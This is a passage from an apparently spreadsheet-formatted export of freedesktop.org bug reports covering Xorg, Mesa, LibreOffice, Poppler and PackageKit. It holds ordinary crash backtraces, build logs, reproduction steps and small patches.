X server log seems unremarkable I attach it just in case.</t>
  </si>
  <si>
    <t>XORG-12532</t>
  </si>
  <si>
    <t>[945GM TTM] server startup fails: no ring space</t>
  </si>
  <si>
    <t>The current git intel driver doesnt work for my 945GM
kernel-2.6.22.6 (vanilla)
Xorg-7.3
mesa (current git)
mesa-drm (current git)
intel-driver (current git)
the folliwing commit seems to cause the problem(because of the memory change)
Merge branch 'buffer-objects' master
author  Eric Anholt 
   Sat 22 Sep 2007 00:14:44 +0000 (17:14 -0700)
  committer  Eric Anholt 
   Sat 22 Sep 2007 00:20:15 +0000 (17:20 -0700)
  commit  130f79613bfe6a8cfa7f431c8cce06cbb93cc91a</t>
  </si>
  <si>
    <t>MEDIA-PLAYER-INFO-30726</t>
  </si>
  <si>
    <t>Add 5 HTC Android phones</t>
  </si>
  <si>
    <t>Created attachment 39299
patch
HTC Dream
HTC Android Dev Phone 1
HTC G1
HTC Magic
(all have the same ids...)</t>
  </si>
  <si>
    <t>LIBREOFFICE-77759</t>
  </si>
  <si>
    <t>Embedded excel getting renamed to binary object (only rename no format change)</t>
  </si>
  <si>
    <t>Problem description: 
The embedded excel (xlsx) when inserted on its own (unlike with chart) is getting converted to .bin. Note that only extension differs otherwise its an excel file only. There is no loss of user experience in editing the file in MS Word.
The similar case is also exists when power point is inserted on it's own.
Steps to reproduce:
1. Open the attached file in LO
2. Export to DOCX format.
3. Observe the [Content_Types].xml. The .xlsx extension is getting changed to .bin
Current behavior:
The embedded excel (xlsx) when inserted on its own (unlike with chart) is getting converted to .bin. 
Expected behavior:
The embedded excel (xlsx) when inserted on its own (unlike with chart) should have the extension .xlsx as it is.</t>
  </si>
  <si>
    <t>XORG-15069</t>
  </si>
  <si>
    <t>App/xprop</t>
  </si>
  <si>
    <t>xorg/app/xprop - Compile warning fixes</t>
  </si>
  <si>
    <t>Created attachment 15199
0001-Compile-warning-fixes.patch
Declare some functions as static and include clientwin.h to ensure
prototype and defintion match.</t>
  </si>
  <si>
    <t>LIBREOFFICE-51569</t>
  </si>
  <si>
    <t>ASKLIBREOFFICE Button to select best answer is missing</t>
  </si>
  <si>
    <t>I'm not currently able to select the best answer for any question I've posted on the Ask.LO site as I can't find the button in the web interface.
I posted the following question and got confirmation from another user that the select button was missing:
http://ask.libreoffice.org/question/3617/how-do-i-mark-the-best-answer-to-my-question-on/
@tohuwawohu wrote:
---
This site had a short downtime last weekend to update the askbot software (should fix the upload images bug but didn't sadly). Since that downtime the button to accept an answer has disappeared.
---
This seems like a pretty bad bug as it blocks the fundamental workflow of the site and frustrates every new user who tries to follow instructions and mark their questions as correctly answered. Given the disruption this bug causes I'm setting severity to 'critical' feel free to triage into a new category as appropriate.</t>
  </si>
  <si>
    <t>HAL-3468</t>
  </si>
  <si>
    <t>undefined reference to dbus_connection_disconnect in lshal.c:459</t>
  </si>
  <si>
    <t>hal doesn't build against dbus since the latest api changes since
dbus_connection_disconnect was renamed to dbus_connection_close.</t>
  </si>
  <si>
    <t>DRI-97137</t>
  </si>
  <si>
    <t>R7 M370 hangs with radeon.dpm=1 when running demanding graphical programs with DRI PRIME</t>
  </si>
  <si>
    <t>I own a laptop (Thinkpad E560) with an Intel+Radeon gpu combo. When trying to run demanding graphical programs with the radeon gpu via dri prime it hangs. In this context demanding programs are anything more demanding than glxgears (which runs fine).
If I boot with radeon.dpm=0 everything runs fine but at the low default clock speeds. I have been unable to set faster clock speeds via the sysfs interface.
I have tried drm-next from https://cgit.freedesktop.org/~airlied/linux/?h=drm-next together with the latest git linux-firmware but the problem is the same.
The problem can be replicated by running 'glmark2 -b texture'. However 'glmark2 -b build' seems to work without any problems.</t>
  </si>
  <si>
    <t>registo.mailling</t>
  </si>
  <si>
    <t>MESA-107891</t>
  </si>
  <si>
    <t>[wine regression bisected] RAGE Wolfenstein The New Order hangs in menu</t>
  </si>
  <si>
    <t>The games RAGE and Wolfenstein The New Order (using Wine) hangs after a short while in the menu. 
Trying older Mesa releases (and a hacked Wine to work around the need for a compatibility context) 17.3.9 does not have this issue.
Bisecting lead to 
bc65dcab3bc48673ff6180afb036561a4b8b1119
radeonsi: avoid syncing the driver thread in si_fence_finish
It is really only required when we need to flush for deferred fences.
It's not possibly to revert that commit cleanly on 18.2.0 but moving back ctx = threaded_context_unwrap_sync(ctx) to its original place is enough to get rid of the hang.</t>
  </si>
  <si>
    <t>DRI-47990</t>
  </si>
  <si>
    <t>[PNV]I-G-T/gem_tiled_after_untiled_blt fail</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform:        Pineview
Kernel: (drm-intel-next-queued)1d83f4426fa0555c98c989915be6df01a8125aca
Bug detailed description:
-------------------------
   On PNV platform running gem_tiled_after_untiled_blt of the
Intel-gpu-tools will fail.
  the error on the console is like this:
   filling ring
   playing tricks
   checking
   gem_tiled_after_untiled_blt: gem_tiled_after_untiled_blt.c:197: main:    Assertion `data[i] == i' failed.
   Aborted (core dumped)
   Here is the GDB backtrace:
#0  0xb7fff424 in __kernel_vsyscall ()
#1  0x4105498f in raise () from /lib/libc.so.6
#2  0x410562d5 in abort () from /lib/libc.so.6
#3  0x4104d6a5 in __assert_fail_base () from /lib/libc.so.6
#4  0x4104d757 in __assert_fail () from /lib/libc.so.6
#5  0x0804993a in main (argc=1 argv=0xbffff334) at     gem_tiled_after_untiled_blt.c:197</t>
  </si>
  <si>
    <t>XORG-2030</t>
  </si>
  <si>
    <t>Support of Cherry Cymotion Master Linux keyboard</t>
  </si>
  <si>
    <t>I'll submit a patch.  Existing support for the Cherry Cymotion Master Xpress is
not sufficient for this (similar) keyboard.</t>
  </si>
  <si>
    <t>patch-freedesktop</t>
  </si>
  <si>
    <t>LIBREOFFICE-30472</t>
  </si>
  <si>
    <t>tiff transparent pixels shown as black one</t>
  </si>
  <si>
    <t>Transparent pixels in tiff images (both inserted from file or imported as part of some other format like docx) are shown as black one. So if we have image with some black content on transparent background we got completely black rectangle instead.</t>
  </si>
  <si>
    <t>LIBREOFFICE-37516</t>
  </si>
  <si>
    <t>FILESAVE LibreOffice does not produce valid DOC documents</t>
  </si>
  <si>
    <t>1. Open LibreOffice 3.4 RC1 Writer.
2. Write a line e.g. This is a test.
3. Save as Word 97 DOC format.
4. Open the file in MS Office 2010.
-&gt; Protected View. Office has detected a problem with this file. Editing may harm your computer. Click for more details.
Same sample saved from LibreOffice 3.3 is valid.</t>
  </si>
  <si>
    <t>XORG-32701</t>
  </si>
  <si>
    <t>xrdb-1.0.7 ignores continuation lines runtime error with GCC 4.5</t>
  </si>
  <si>
    <t>Created attachment 41488
Proposed patch for xrdb.c
This is a forward of Gentoo bug 347758: 
I've the following in my .Xdefaults (unchanged since a long time):
    *VT100.Translations: #override \
        BackSpace: string(0x7F)\n\
        Delete:    string(\033[3~)
With xrdb-1.0.7 and gcc-4.5.1 the backslash for line continuation doesn't work any more. xrdb -q shows that each of the above lines will end up in an own resource:
*VT100.Translations:    #override
BackSpace: string(0x7F)\n
Delete:    string(\033[3~)
Whereas with gcc-4.4.5 everything is as it should be:
*VT100.Translations: #override    BackSpace: string(0x7F)\n    Delete: string(\033[3~)
The problem depends only on the gcc version active at run time. It doesn't matter if xrdb is compiled with gcc 4.4 or 4.5.
My guess is that it's caused by this change of C preprocessor behaviour: 
So adding option -P or -traditional-cpp to the cpp call should fix the problem.
Patch is attached.</t>
  </si>
  <si>
    <t>ulm</t>
  </si>
  <si>
    <t>PACKAGEKIT-41444</t>
  </si>
  <si>
    <t>command-not-found should wait for return to be pressed</t>
  </si>
  <si>
    <t>I was about to do a 'yum update' on a system I rarely use. What I normally do is this
 # screen
 # yum update
but this particular system did not have the screen(1) command installed. So /usr/libexec/pk-command-not-found stepped in and offered to install it for me... but since I had already begun typing 'yum update' it intercepted the 'y' and just installed the screen package for me.
I think this is a bit dangerous - you should wait for the user to press y then enter before going ahead.
Also when screen(1) was finally installed and pk-command-not-found tried to run it things didn't work because of this bug
 https://bugzilla.redhat.com/show_bug.cgi?id=682242
because of issues with handling and passing the standard streams.</t>
  </si>
  <si>
    <t>LIBREOFFICE-62151</t>
  </si>
  <si>
    <t>[UI] Calc / Spreadsheet comments leave trace after shown and hidden</t>
  </si>
  <si>
    <t>Created attachment 76320
Cut comment.
Way to reproduce:
1. Pick any cell on new spreadsheet lets say C5 enter any text in it copy it lets say 10 cells down.
2. Pick cell D5 enter any number in it and copy it same as in step 1.
3. Pick cell C10 right click ADD COMMENT write anything in comment.
4. Press ESC comment will collapse.
5. Hower your mouse over C10 and comment will appear.
6. Move your mouse away from C10 and comment will dissapear but part of comment will stay on screen!
Picture attached.
Comment is always cut at cell bottom border.</t>
  </si>
  <si>
    <t>XORG-107385</t>
  </si>
  <si>
    <t>full Screen Corruption when a program is fullscreen</t>
  </si>
  <si>
    <t>Created attachment 140826
glxinfo
This seemed to appear a few days ago after updating the obiaf ppa on Ubuntu 18. I did not have this problem before.
Basically any time certain programs are fullscreen the screen becomes corrupted and looks like a corrupted version of the login background however everything is still intractable and (I'm using Gnome) pressing the super key allows me to view the application and kill it. 
The view within (Whatever the application window thing is called) works and I can see the loading animations the start menu and everything which is how I have managed to get a few applications out of fullscreen and they work fine when not in fullscreen.
Attempting to screenshot the problem doesn't seem to work. LightDM also has this issue the screen looks the exact same with even the same colors. glxinfo is also attached. Not too sure what other information I need to include?
OS: Ubuntu 18
Mesa Version: 18.2.0
Graphics Card: R9 390x (8GB)</t>
  </si>
  <si>
    <t>monkeyinastripedshirt</t>
  </si>
  <si>
    <t>POPPLER-16953</t>
  </si>
  <si>
    <t>Wrong rendering of color for DeviceRGB pictures</t>
  </si>
  <si>
    <t>This is an upstream bug report of the Mandriva bug 42204 .
Some picture (all jpeg?) are rendered completely wrong color-wise: more or less like an negative.
For examples:
 http://ubuntulife.files.wordpress.com/2008/07/guiakde41.pdf
 http://download.tuxfamily.org/magnum/doc/magnum04.pdf
I have a pdf which contains just one jpeg declared /ColorSpace /DeviceRGB /BitsPerComponent 8 and it happens on it as well.
Poppler version 0.8.4. I think it happens only since one or two months (~0.8.3). xpdf displays them correctly.</t>
  </si>
  <si>
    <t>MESA-98774</t>
  </si>
  <si>
    <t>glsl/tests/warnings-test regression</t>
  </si>
  <si>
    <t>$ make check
[...]
PASS: glsl/glcpp/tests/glcpp-test
PASS: glsl/glcpp/tests/glcpp-test-cr-lf
PASS: glsl/tests/blob-test
PASS: glsl/tests/cache-test
PASS: glsl/tests/general-ir-test
PASS: glsl/tests/optimization-test
PASS: glsl/tests/sampler-types-test
PASS: glsl/tests/uniform-initializer-test
FAIL: glsl/tests/warnings-test
PASS: nir/tests/control_flow_tests
============================================================================
Testsuite summary for Mesa 13.1.0-devel
============================================================================
# TOTAL: 10
# PASS:  9
# SKIP:  0
# XFAIL: 0
# FAIL:  1
# XPASS: 0
# ERROR: 0
$ ./glsl_compiler --just-log --version 150 ./glsl/tests/warnings/000-basic-test.vert
0:8(8): warning: `undefined' used uninitialized
Segmentation fault (core dumped)
(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x000000000044a11e in link_intrastage_shaders (mem_ctx=mem_ctx@entry=0x1391320 ctx=ctx@entry=0x717a40  prog=prog@entry=0x1391320 shader_list=0x1391920 
    num_shaders=num_shaders@entry=1 allow_missing_main=allow_missing_main@entry=true) at glsl/linker.cpp:2196
#2  0x0000000000406c02 in standalone_compile_shader (_options=_options@entry=0x717a10  num_files=num_files@entry=1 files=) at glsl/standalone.cpp:494
#3  0x000000000040346b in main (argc= argv=0x7ffe4b919888) at glsl/main.cpp:92
(gdb) frame 1
#1  0x000000000044a11e in link_intrastage_shaders (mem_ctx=mem_ctx@entry=0x1391320 ctx=ctx@entry=0x717a40  prog=prog@entry=0x1391320 shader_list=0x1391920 
    num_shaders=num_shaders@entry=1 allow_missing_main=allow_missing_main@entry=true) at glsl/linker.cpp:2196
2196	                             prog-&gt;Name)
(gdb) print prog-&gt;Name
$1 = 0
9d96d3803ab5dc896d4844ac785db57bb1717f91 is the first bad commit
commit 9d96d3803ab5dc896d4844ac785db57bb1717f91
Author: Timothy Arceri 
Date:   Mon Oct 31 23:54:03 2016 +1100
    glsl: create gl_program at the start of linking rather than the end
    This will allow us to directly store metadata we want to retain in
    gl_program this metadata is currently stored in gl_linked_shader and
    will be lost if relinking fails even though the program will remain
    in use and is still valid according to the spec.
    If a program object that is active for any shader stage is re-linked
    unsuccessfully the link status will be set to FALSE but any existing
    executables and associated state will remain part of the current
    rendering state until a subsequent call to UseProgram
    UseProgramStages or BindProgramPipeline removes them from use.
    This change will also help avoid the double handing that happens in
    _mesa_copy_linked_program_data().
    Reviewed-by: Emil Velikov 
:040000 040000 97d2bb36e78083ac49ae2858d9d710b755d02941 2aa728acfaf8bc58a74f6ea379023f95c42139bf M	src
bisect run success</t>
  </si>
  <si>
    <t>LIBREOFFICE-31523</t>
  </si>
  <si>
    <t>Build broken by OSL_ENSURE checks when configured with --enable-debug</t>
  </si>
  <si>
    <t>These two OSL_ENSURE must be corrected because they broke the build process.
In file dbaccess/source/core/api/RowSet.cxx line 1668 the compiler complains because is() isn't a member function of the object:
OSL_ENSURE( aError.is() ORowSet::impl_prepareAndExecute_throw: caught an SQLException which we cannot analyze! )
In file dbaccess/source/ui/querydesign/QTableWindow.cxx line 191 the same complaint about isValid() member function:
OSL_ENSURE(rInfo.isValid()OQueryTableWindow::ExistsField: invlid argument for OTableFieldDescRef!)
Best regards
Santiago</t>
  </si>
  <si>
    <t>santiago.bosio</t>
  </si>
  <si>
    <t>ACCOUNTSSERVICE-33334</t>
  </si>
  <si>
    <t>Cannot build docs in 0.6.1</t>
  </si>
  <si>
    <t>Making all in doc
make[2]: Entering directory `/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc'
Making all in dbus
make[3]: Entering directory `/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus'
/usr/bin/xmlto  xhtml-nochunks -m ../../doc/dbus/config.xsl AccountsService.xml
xmlto: /var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml does not validate (status 3)
xmlto: Fix document syntax or use --skip-validation option
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:72: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:82: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:97: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:101: element refsect2: validity error : Element refsect2 content does not follow the DTD expecting (refsect2info?  (title  subtitle?  titleabbrev?)  (((calloutlist | glosslist | itemizedlist | orderedlist | segmentedlist | simplelist | variablelist | caution | important | note | tip | warning | literallayout | programlisting | programlistingco | screen | screenco | screenshot | synopsis | cmdsynopsis | funcsynopsis | classsynopsis | fieldsynopsis | constructorsynopsis | destructorsynopsis | methodsynopsis | formalpara | para | simpara | address | blockquote | graphic | graphicco | mediaobject | mediaobjectco | informalequation | informalexample | informalfigure | informaltable | equation | example | figure | table | msgset | procedure | sidebar | qandaset | anchor | bridgehead | remark | highlights | abstract | authorblurb | epigraph | indexterm | beginpage)+  refsect3*) | refsect3+)) got (title indexterm programlisting para CDATA variablelist note note)
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:111: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:121: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:136: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:150: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:160: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:173: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:181: element simpara: validity error : Element para is not declared in simpara list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:184: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:196: element simpara: validity error : Element para is not declared in simpara list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:199: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:216: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:231: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:266: element para: validity error : Element para is not declared in para list of possible children
/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml:321: element para: validity error : Element para is not declared in para list of possible children
Document /var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus/AccountsService.xml does not validate
make[3]: Leaving directory `/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc/dbus'
make[3]: *** [AccountsService.html] Error 13
make[2]: Leaving directory `/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1/doc'
make[1]: Leaving directory `/var/tmp/paludis/sys-apps-accountsservice-0.6.1/work/accountsservice-0.6.1'
make[2]: *** [all-recursive] Error 1
make[1]: *** [all-recursive] Error 1
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>MESA-59879</t>
  </si>
  <si>
    <t>reducing symbol visibility of shared objects / static libstdc++</t>
  </si>
  <si>
    <t>Hello
this is sort of cleaned up report of bug #37637.
To quickly summarize what happens there: Build r600g with the llvm compiler backend and try starting ut2003. Segfault happens since apparantly ut's engine has a version of libstdc++ built in which now clashes with the libstdc++ shared lib which either r600_dri.so or LLVM (when build as shared) loads. This is independent of preloading order. When the symbols from the system libstdc++ take preference then the game engine crashes. When the game engine symbols take preference the r600g driver initialization crashes.
The fix for the problem: Since we can't modify the ut2003 binary we have to hide the duplicate symbols somehow.
This means:
- build r600g with static llvm
- build r600 with static libstdc++
- only make those symbols in r600_dri.so visible which are necessary
Building r600g with static llvm is trivial. The symbol visibility can be properly handled by ld:
http://sourceware.org/binutils/docs-2.21/ld/VERSION.html#VERSION
My current dri-symbols.map:
{
  global: __dri* dri* _glapi*
  local: *
}
This hides everything except for the symbols matching __dri* dri* and _glapi*. This can be potentially reduced even further. However it's not clear to me what the loader code in libGL really needs.
This version-script'ing can be properly put into autotools language:
http://www.gnu.org/software/gnulib/manual/html_node/LD-Version-Scripts.html
----------------------------
What I'm struggling with is properly telling autotools to build a shared lib with static libstdc++. The gcc manpage mentions an option called -static-libstdc++ but it doesn't seem to have any effect.
Let's look at the critical calls (I've shortened them somewhat):
OK we're in src/gallium/targets/dri-r600. The last libtool call that the Makefile executes is the following one:
bin/sh ../../../../libtool  --tag=CXX   --mode=link g++  -g -O2 -Wall -fno-strict-aliasing -fno-builtin-memcmp  -module -avoid-version -shared -no-undefined -Wl--version-script=../../../../src/gallium/targets/dri-symbols.map -L/usr/lib64/llvm  -lpthread -lffi -ldl -lm   -o r600_dri.la -rpath /usr/local/lib/dri target.lo utils.lo dri_util.lo xmlconfig.lo  -ldrm   -lexpat -lm -lrt -lpthread -ldl -ldrm   -ldrm_radeon   
libtool itself produces this call from it:
g++ -fPIC -DPIC -shared -nostdlib  -Wl--whole-archive  -Wl--no-whole-archive  -L/usr/lib64/llvm  -lexpat -lrt -lpthread -ldl -ldrm -ldrm_radeon  -L/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2 -L/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/../../../../lib64 -L/lib/../lib64 -L/usr/lib/../lib64 -L/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/../../../../x86_64-pc-linux-gnu/lib -L/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/../../.. -lstdc++ -lm -lc -lgcc_s  -O2 -Wl--version-script=../../../../src/gallium/targets/dri-symbols.map -Wl-soname -Wlr600_dri.so -o .libs/r600_dri.so
Notice the -lstdc++ dynamic linking to libstdc++. What I'd like libtool (and eventually autotools) to produce is the following:
g++ -fPIC -DPIC -shared -nostdlib  -Wl-Bstatic -lstdc++ -Wl-Bdynamic -Wl--whole-archive  -Wl--no-whole-archive  -L/usr/lib64/llvm  -lexpat -lrt -lpthread -ldl -ldrm -ldrm_radeon  -L/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2 -L/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/../../../../lib64 -L/lib/../lib64 -L/usr/lib/../lib64 -L/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/../../../../x86_64-pc-linux-gnu/lib -L/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/../../.. -lm -lc -lgcc_s  -O2 -Wl--version-script=../../../../src/gallium/targets/dri-symbols.map -Wl-soname -Wlr600_dri.so -o .libs/r600_dri.so
This is just removing -lstdc++ and replacing it by -Wl-Bstatic -lstdc++ -Wl-Bdynamic at a different position (!). Putting it in front of the archive assembly seems to be critical.
This links fine (no warnings etc.) and produces a .so that is loaded properly by libGL's loader and (more importantly) works fine with ut2003.
However it is still a mystery to me how to makes this clear to either libtool or autotools.
Greets
Tobias</t>
  </si>
  <si>
    <t>LIBREOFFICE-37484</t>
  </si>
  <si>
    <t>UI - On any animation change list is reloaded and current position in list is lost.</t>
  </si>
  <si>
    <t>Whenever you change the properties of a custom animation the list of animations is refreshed and the first entry is selected. Thus you lose your position in the list. If you were editing an item near the bottom of the list you have to scroll all the way down and find the item again in order to continue editing.
Solution: update the list dynamically so that the selection focus stays on the currently selected item.</t>
  </si>
  <si>
    <t>skywalkersymes</t>
  </si>
  <si>
    <t>PACKAGEKIT-20681</t>
  </si>
  <si>
    <t>/usr/bin/gpk-backend-status is missing an icon defaults to ugly X one</t>
  </si>
  <si>
    <t>/usr/bin/gpk-backend-status is missing an icon defaults to ugly X one.</t>
  </si>
  <si>
    <t>POPPLER-3491</t>
  </si>
  <si>
    <t>Memory leak in CairoFontEngine.cc</t>
  </si>
  <si>
    <t>tmpFileName isn't being freed properly.</t>
  </si>
  <si>
    <t>XORG-14444</t>
  </si>
  <si>
    <t>Xorg crash when changing backlight properties on text console.</t>
  </si>
  <si>
    <t>Created attachment 14234
Xorg log
Hello:
  I wanted to change xserver backlight settings using xrandr on a text console. I did this:
  DISPLAY=:0 xrandr --output LVDS --set BACKLIGHT_CONTROL native
  This is a toshiba satellite laptop amd64 intel 965GM with Debian unstable 2.6.24 xserver 2:1.4.1~git20080131-1 intel driver git 20080203.
  I know this is not a very common way to do it but xserver crashed with this backtrace.
#0  XkbEnableDisableControls (xkbi=0x190 change=
    newValues= changes=0x0 cause=0x7fff9c459890) at ../../xkb/xkbUtils.c:748
#1  0x0000000000540759 in XkbRemoveResourceClient (inDev=0x87ea10 id=)
    at ../../xkb/xkbEvents.c:1038
#2  0x000000000044735b in CloseDevice (dev=0x87ea10) at ../../dix/devices.c:604
#3  0x000000000044754f in CloseDownDevices () at ../../dix/devices.c:626
#4  0x000000000056a643 in AbortServer () at ../../os/log.c:405
#5  0x000000000056ac95 in FatalError (f=0x5738a8 Caught signal %d.  Server aborting\n)
    at ../../os/log.c:552
#6  0x00000000004756d9 in xf86SigHandler (signo=11)
    at ../../../../hw/xfree86/common/xf86Events.c:766
#7  
#8  0x00002b370fb78deb in memcpy () from /lib/libc.so.6
#9  0x00000000004af303 in xf86_crtc_convert_cursor_to_argb (crtc=0x2b3712d44000
    src=0x955710 ?ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½) at ../../../../hw/xfree86/modes/xf86Cursors.c:216
#10 0x00000000004afd67 in xf86_load_cursor_image (scrn=
    src=0x955710 ?ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½) at ../../../../hw/xfree86/modes/xf86Cursors.c:438
#11 0x00000000004af997 in xf86_reload_cursors (screen=0x8300f0)
    at ../../../../hw/xfree86/modes/xf86Cursors.c:614
#12 0x00002b37117c0ebc in i830_crtc_commit (crtc=0x8067a0) at ../../src/i830_display.c:928
#13 0x00000000004aeb2e in xf86CrtcSetMode (crtc=0x8067a0 mode=0x7fff9c45a280
---Type  to continue or q  to quit---
    rotation= x=0 y=0) at ../../../../hw/xfree86/modes/xf86Crtc.c:312
#14 0x00000000004b298c in xf86RandR12CrtcSet (pScreen= randr_crtc=0x84d2d0
    randr_mode=0x8490d0 x=0 y=0 rotation=16384 num_randr_outputs=1 randr_outputs=0x84e870)
    at ../../../../hw/xfree86/modes/xf86RandR12.c:777
#15 0x000000000051a90f in RRCrtcSet (crtc=0x84d2d0 mode=0x8490d0 x=0 y=0 rotation=1
    numOutputs=1 outputs=0x84e870) at ../../randr/rrcrtc.c:300
#16 0x000000000051b012 in ProcRRSetCrtcConfig (client=0x15f1490) at ../../randr/rrcrtc.c:833
#17 0x000000000044e3b0 in Dispatch () at ../../dix/dispatch.c:502
#18 0x0000000000436b8d in main (argc=8 argv=0x7fff9c45aa58 envp=)
    at ../../dix/main.c:452</t>
  </si>
  <si>
    <t>rasasi78</t>
  </si>
  <si>
    <t>TELEPATHY-17751</t>
  </si>
  <si>
    <t>BaseConnection::self_handle should not be set to 0 before the object is disposed</t>
  </si>
  <si>
    <t>Currently BaseConnection::self_handle is set to 0 just before status-changed(Disconnected â€¦) is emitted and in 0.17.16 it will change just after status-changed(Disconnected â€¦) is emitted to allow ChannelManagers listening for that signal to use the self_handle.
Ideally the self_handle would be valid until the BaseConnection is disposed but CMs may wrongly depend on it being 0 by the time the dispose method for their subclass of TpBaseConnection is called.  (For instance Gabble asserts that it is 0.)  We should audit and fix all known connection managers then move the unreffing to dispose.</t>
  </si>
  <si>
    <t>LIBREOFFICE-74652</t>
  </si>
  <si>
    <t>Extra image gets added in first page</t>
  </si>
  <si>
    <t>Created attachment 93587
file contains tables &amp; images.
Problem description:
- File contains tables images.
- Problem is that image at last page come at first page after roundtrip.
Steps to reproduce:
1. Open the file in LibreOffice
2. Click File -&gt; Save As (Microsoft Word 2007/2010 (.docx))
3. Open saved file in MS Office 2010.
Expected:
File should same as original.
Actual:
The image get large show at first page.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-17037</t>
  </si>
  <si>
    <t>Created attachment 18184
SSH Key
Please can I have an account?
Name: John Carr
Mail: john.carr@unrouted.co.uk
Account Name: johncarr</t>
  </si>
  <si>
    <t>john.carr</t>
  </si>
  <si>
    <t>DRI-21351</t>
  </si>
  <si>
    <t>R600+DRI: glxgears crash</t>
  </si>
  <si>
    <t>Created attachment 25058
LIBGL_DEBUG=verbose glxgears
Using:
http://cgit.freedesktop.org/mesa/mesa/log/?h=r6xx-r7xx-support
commit cccd7ae6e60c2454f9b68e03ec561e9b780a065c
R6xx: Fix memory free issue and correct clip rectangle
http://cgit.freedesktop.org/~agd5f/drm/?h=r6xx-r7xx-3d
commit dec0572d6e7e2ce1c6de2315a790e8de37c589c0
Fix typo in IT_EVENT_WRITE packet checker
+ init_mm.patch for drm (for 2.6.29 kernel).
I get glxgears crash.</t>
  </si>
  <si>
    <t>maximsch2</t>
  </si>
  <si>
    <t>REALMD-91185</t>
  </si>
  <si>
    <t>adcli uses previous kvno when joining to existing account</t>
  </si>
  <si>
    <t>I noticed that adcli gets the kvno from AD when joining but does not increase it for the new enroll
This might be a wrong place to fix it but saved my day
----
diff --git a/library/adenroll.c b/library/adenroll.c
index e81eaf2..c500232 100644
--- a/library/adenroll.c
+++ b/library/adenroll.c
@@ -98810 +98812 @@ retrieve_computer_account (adcli_enroll *enroll)
                                res = ADCLI_ERR_DIRECTORY
                        } else {
-                               enroll-&gt;kvno = kvno
+                         /* should increase here??? */
+                               enroll-&gt;kvno = kvno+1
                                _adcli_info (Retrieved kvno '%s' for computer account in directory: %s
                                             value enroll-&gt;computer_dn)
+
                        }
                        free (value)</t>
  </si>
  <si>
    <t>et</t>
  </si>
  <si>
    <t>XORG-31599</t>
  </si>
  <si>
    <t>Segfault on XI2 device removal</t>
  </si>
  <si>
    <t>Hi there again 
When adding lots of XI2 devices with xinput create-master and then
trying to remove the last one X segfaults.
What follows is some lengthy info the interesting stuff at the end :-)
xinput list output after device creation failed cause MAX_DEVICES reached and just before xinput remove-master 38:
--snip--
âŽ¡ Virtual core pointer                    	id=2	[master pointer  (3)]
âŽœ   â†³ Virtual core XTEST pointer              	id=4	[slave  pointer  (2)]
âŽœ   â†³ SynPS/2 Synaptics TouchPad              	id=13	[slave  pointer  (2)]
âŽ£ Virtual core keyboard                   	id=3	[master keyboard (2)]
